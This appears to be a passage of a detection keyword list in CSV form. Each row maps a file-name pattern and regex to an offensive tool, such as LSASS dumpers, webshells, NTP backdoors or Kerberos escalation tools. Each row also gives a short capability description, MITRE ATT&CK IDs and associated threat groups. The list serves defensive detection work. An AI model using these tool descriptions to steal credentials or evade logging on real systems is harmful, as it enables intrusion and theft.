"*\runswhide.lua*",".{0,1000}\\runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","18225"
"*\RunWithPathAsAdmin.bat*",".{0,1000}\\RunWithPathAsAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","18226"
"*\RunWithRegistryNonAdmin.bat*",".{0,1000}\\RunWithRegistryNonAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","18227"
"*\rusthound.exe*",".{0,1000}\\rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","18233"
"*\rustive.dmp*",".{0,1000}\\rustive\.dmp.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","18234"
"*\RustiveDump.bin*",".{0,1000}\\RustiveDump\.bin.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","18235"
"*\RustiveDump.exe*",".{0,1000}\\RustiveDump\.exe.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","18236"
"*\RustPotato-main*",".{0,1000}\\RustPotato\-main.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","18237"
"*\RustRedOps\*",".{0,1000}\\RustRedOps\\.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18238"
"*\RustRedOps-main*",".{0,1000}\\RustRedOps\-main.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18239"
"*\s3aclenum.py*",".{0,1000}\\s3aclenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18243"
"*\s3enum.py*",".{0,1000}\\s3enum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18244"
"*\S4U.Exe*",".{0,1000}\\S4U\.Exe.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","18245"
"*\S4U.Exe*",".{0,1000}\\S4U\.Exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","18246"
"*\S4uDelegator.*",".{0,1000}\\S4uDelegator\..{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18247"
"*\S4UTomato\*",".{0,1000}\\S4UTomato\\.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","18248"
"*\s72 Shell v1.1 Coding.php*",".{0,1000}\\s72\sShell\sv1\.1\sCoding\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18249"
"*\Safe_mode_AnyDesk.txt*",".{0,1000}\\Safe_mode_AnyDesk\.txt.{0,1000}","offensive_tool_keyword","Dispossessor","notes used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18250"
"*\SafetyDump.csproj*",".{0,1000}\\SafetyDump\.csproj.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","18255"
"*\SafetyDump.exe*",".{0,1000}\\SafetyDump\.exe.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","18256"
"*\SafetyDump.sln*",".{0,1000}\\SafetyDump\.sln.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","18257"
"*\SafetyKatz*",".{0,1000}\\SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","18258"
"*\SafetyKatz.dll*",".{0,1000}\\SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18259"
"*\SafetyKatz.dll*",".{0,1000}\\SafetyKatz\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18260"
"*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18261"
"*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18262"
"*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18263"
"*\sAINT-master.zip*",".{0,1000}\\sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","18264"
"*\Sako RAT.exe*",".{0,1000}\\Sako\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18265"
"*\SAM-*.dmp*",".{0,1000}\\SAM\-.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","18266"
"*\SAM-*.dmp.LOG*",".{0,1000}\\SAM\-.{0,1000}\.dmp\.LOG.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","18267"
"*\SAM\.Sam-Full.txt*",".{0,1000}\\SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","18268"
"*\samantha.txt",".{0,1000}\\samantha\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","18269"
"*\sambaPipe.py*",".{0,1000}\\sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18270"
"*\sampasswd.*",".{0,1000}\\sampasswd\..{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18271"
"*\sample_brc4.json*",".{0,1000}\?sample_sliver\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","18272"
"*\sample_sliver.json*",".{0,1000}\?sample_sliver\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","18273"
"*\samrdump.exe*",".{0,1000}\\samrdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18274"
"*\samrdump.py*",".{0,1000}\\samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18275"
"*\Sandman.exe*",".{0,1000}\\Sandman\.exe.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18276"
"*\sandman_server.py*",".{0,1000}\\sandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18277"
"*\SandmanBackdoorTimeProvider.dll*",".{0,1000}\\SandmanBackdoorTimeProvider\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18278"
"*\Sandman-master.zip*",".{0,1000}\\Sandman\-master\.zip.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","18279"
"*\santi RAT.exe*",".{0,1000}\\santi\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18280"
"*\SauronEye.exe*",".{0,1000}\\SauronEye\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18281"
"*\SauronEye.exe*",".{0,1000}\\SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18282"
"*\save_reg.hive*",".{0,1000}\\save_reg\.hive.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","18283"
"*\scan4all.exe*",".{0,1000}\\scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","18284"
"*\scan4all-main*",".{0,1000}\\scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","18285"
"*\scanACLsResults.csv*",".{0,1000}\\scanACLsResults\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","18286"
"*\ScanInterception.ps1*",".{0,1000}\\ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18287"
"*\scan-network.py*",".{0,1000}\\scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18288"
"*\SchTask.sln*",".{0,1000}\\SchTask\.sln.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","18290"
"*\SchTask.zip*",".{0,1000}\\SchTask\.zip.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","18291"
"*\SchTask_0x727\*",".{0,1000}\\SchTask_0x727\\.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","18292"
"*\SchTaskBackdoor.*",".{0,1000}\\SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","18293"
